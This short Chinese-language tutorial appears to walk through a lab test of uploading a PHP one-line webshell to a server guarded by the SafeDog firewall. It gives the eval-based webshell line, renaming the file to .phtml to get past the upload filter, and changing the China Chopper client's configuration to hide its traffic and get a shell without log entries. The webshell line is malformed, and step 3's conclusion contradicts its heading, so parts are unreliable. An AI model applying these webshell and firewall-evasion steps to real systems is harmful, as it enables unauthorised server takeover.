1、先試着上傳一句話木馬1.php
<?php @eval($_POST([cmd]);?>
打開目標機查看安全狗日誌
可以看出,安全狗策略禁止上傳.php文件
2、馬被免殺,菜刀沒被免殺
可以考慮更改後綴名爲.phtml再次上傳
上傳成功
使用菜刀連接,發現連接失敗
打開目標機查看安全狗日誌
出現chooper工具這一句話,證明馬免殺,菜刀沒免殺
3、菜刀免殺,馬沒免殺
第一步已經知道安全狗攔截.php文件,可以在目標系統上先寫一個一句話木馬1.php文件,然後再使用菜刀連接,查看效果。
使用菜刀連接,發現連接失敗
查看日誌記錄爲
證明馬免殺,菜刀沒免殺
4、菜刀免殺 馬免殺
修改菜刀配置文件
不出現任何記錄,可以使用菜刀直接獲取shell
隱藏菜刀流量特徵
可在日誌文件中查看